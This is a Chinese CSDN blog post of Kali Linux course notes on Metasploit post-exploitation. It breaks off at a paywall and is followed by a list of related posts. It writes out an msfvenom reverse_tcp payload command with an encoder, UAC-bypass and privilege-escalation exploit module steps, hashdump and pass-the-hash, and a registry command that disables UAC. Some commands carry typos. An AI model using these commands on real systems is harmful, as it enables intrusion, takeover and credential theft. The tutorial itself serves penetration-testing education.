Kali Linux渗透测试——MSF实战篇(二)

已于 2022-01-20 22:01:13 修改
阅读量3.1k 收藏 37
点赞数 4
分类专栏: Kali Linux渗透测试 文章标签: 渗透测试 kali linux metasploit
于 2020-01-07 10:39:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Captain_RB/article/details/103837565
版权

笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程

文章目录

基于已经获得目标系统控制权后扩大攻击效果

  • 提权
  • 信息收集
  • 渗透内网
  • 永久后门

后渗透阶段可以做的大量工作,很大程度上取决于meterpreter/shell的强大功能

一、基于已有session提权

首先进入meterpreter/shell,诱使攻击目标访问构造程序后,即反弹shell

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.11.151 LPORT=4444 -b "\x00" -e x86/shikata -i 9 -f exe -o 1.exe

拿到metepreter shell后提权
注意:用msfvenom构造的windows/meterpreter/reverse_tcp默认是x86架构,windows/x64/meterpreter/reverse_tcp是x64架构

load priv
getsystem

此时若显示Operation failed:Access is denied,则一般是因为UAC,接下来绕过UAC限制

UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista之后的系统引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限

local目录中的模块主要针对已获取的session

#方法一:
use exploit/windows/local/ask       
set session
set filename
run                                 #UAC会询问是否接受未知程序,如果选择是,则通过UAC许可

#方法二:
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
set session
set payload
run
#随后在生成的shell中提权
getsystem
getuid               #可以看见提升为系统用户

只有管理用户组中的成员绕过UAC后才能提权,普通用户即便是绕过了UAC,一样无法提权到system,此时要利用漏洞直接提权为system。

use exploit/windows/local/ms13_053_schlamlperei
set payload/RHSOTS/session
run                                 #此时getuid可以看到直接就是system权限

use exploit/windows/local/ms13_081_track_popup_menu
set payload/RHSOTS/session
run

#也可以使用图形化payload,可以监视攻击目标的桌面(注意这个payload并不是所有模块都能使用,ms13_053_schlamlperei可以使用)
set payload windows/vncinject/reverse_tcp   
#如果要操作攻击者的桌面,要修改参数viewonly为no

VNC和远程桌面都能实现远程控制,不同的是:VNC使用RFB协议(C/S架构5900端口,B/S架构5800端口),远程桌面使用RDP协议(3389端口)

二、提权后进一步操作

1.密码获取与登录
#在具备系统权限的shell中运行hashdump模块
run post/windows/gather/hashdump           
#在得到哈希值后,可以用passthehash,根据哈希值直接登录用户
#passthehash在metasploit中也有专用模块
use exploit/windows/smb/psexec
set SMBUser
set SMBPass xxx:xxx(hash值)
set payload windows/meterpreter/reverse_tcp
run            #失败则可能是由于UAC(Command=17,woedCount=0)

#可以利用已经获取的session运行远程命令,关掉UAC
#关掉UAC的命令
cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFRWARE
最低0.47元/天 解锁文章
Captain_RB
关注
  • 4
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali渗透测试实战指南,不可错过的黑客利器
Hacker0830的博客
04-28 2697
Kali Linux是一款专业的渗透测试和安全审计操作系统。Kali基于Debian GNU/Linux发行版,集成了数百个渗透测试和安全审计相关的工具,是黑客和渗透测试人员最常用的操作系统之一。总的来说,学习Kali是一个长期的过程,需要不断学习和实践。但是,掌握Kali的使用对于网络安全人员和黑客攻防方面都有着重要的意义。希望本文所提供的Kali使用教程和相关推荐书籍和网站能够帮助到大家,提高大家的网络安全和黑客攻防技能,为网络安全和互联网的发展做出自己的贡献。kali渗透测试基础教程t=N3I4。
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
最新发布
2401_84519960的博客
05-01 500
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
渗透工具——kalimsf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 6553
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
kali下通过msf中kiwi(mimikatz)模块的使用
失心少年
09-11 1175
kiwi模块:mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
msf使用方法 kali 2022.2
tairitian888的博客
06-26 353
Auxiliary 辅助模块:为渗透测试信息搜索提供了大量的辅助模块支持。 Exploits 攻击模块:利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件。 Payload 攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。 Post 后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。 Encoders 编码模块,将攻击载荷进行编码,来绕过防护软件拦截。 Auxiliary模块可以单独使用 exploit 和payload 模块必须合用 set.
linux入侵安卓,msf入侵android
weixin_39679061的博客
05-13 997
金风玉露一相逢,便胜却,人间无数。两情若是久长时,尤其在,朝朝暮暮。我,恋爱了….实验环境攻击机:kali linux :192.168.0.103受害机:安卓:192.168.0.104用到的工具:- Metasploit- msfvenom- keytools- jarsigner- zipalign- Ettercap实验开始首先使用msfvenom生成一个apk木马1root@kali:~...
Kali Linux渗透测试之提权(二)——WCE、Fgdump、Mimikatz
橘子女侠
04-24 2528
1. Windows身份认证的过程 在登录目标系统时,会将输入的密码进行lmhash和nthash加密; 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统; 如果是远端的主机尝试进行登录目标系统,也是通过远端主机自身将输入的密码进行lmhash和nthash计算,将加密后的密文通过网络进行传输到目标主机; 所以,不论是本地还是远端登录操作系统,密码都是以密文...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
基于Kali Linux渗透测试.pdf
09-06
基于Kali Linux渗透测试.pdf 本文档总结了基于Kali Linux渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面。 1. 渗透测试的概念 渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意...
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2201
使用msfvenom生成木马控制手机
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
kali与编程:小白黑客如何1天会用msf渗透框架
Kali与编程
07-07 2139
一、每日寄语 我们这个世界,从不会给一个伤心的落伍者颁发奖牌。 二、MSF介绍 Metasploit Framework(简称SMF)安全测试工具是一款开源的安全漏洞检测工具,该工具也是免费的,因此安全工作人员常用Metasploit工具来检测系统的安全性。 这款免费工具可以帮助黑客攻击和控制计算机,安全人员也可以用该工具来加强系统对此类工具的攻击。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新。包含了180多种流行的操作系统的应用软件漏洞,以及100多个shellcode。 作为安
Kali Linux使用msf中的explicit模块实现主动、被动两种方式对目标系统的渗透
王先生的蒋小姐的博客
05-19 2335
大家好,我是SuieKa。一个在学计算机网络方面的小白,也是在校大二学生,学以致用,实操记载,博文若有毛病,请一定留言哟 之前我记载了一篇关于kali Linux利用MS17-010(比特币勒索漏洞)对对目标系统的渗透。本博文我们就来了解Metasploit渗透之explicit模块的使用,在讲之前,先了解Metasploit的发明者,以及Metasploit的专业术语。 目录一、简介Metasploit和专业术语二、简单实验(利用ms08_067漏洞渗透**目标系统)三、使用msf中的explicit模块
木马渗透安卓系统实验
polaris___的博客
05-30 4387
1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶机) 10.11.6...
msf生成linux elf木马反弹不成功的解决方法
热门推荐
weixin_42109829的博客
01-06 1万+
0x01 前言 这几天我的msf 要生成linux 的木马 一直反弹不成功,用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf 我分析了一下报错,这个报错是没问题的,但生成的木马只有250b ,这明显是不 0x02 解决问题 我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动
msf出现[-] Unknown command: db_hosts错误
Shanks@CSDN
08-26 7731
笔记:Metasploit, The Penetration Tester's Guide 内容:msf出现[-] Unknown command: db_hosts错误 在Msfconsole中使用db_hosts命令出现如下错误: [-] Unk
VMWare服务器“Access is denied.无法访问D盘 拒绝访问” 解决方案
09-14 6555
VMware出现Access is denied“无法访问D盘 拒绝访问” 的解决方案。
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值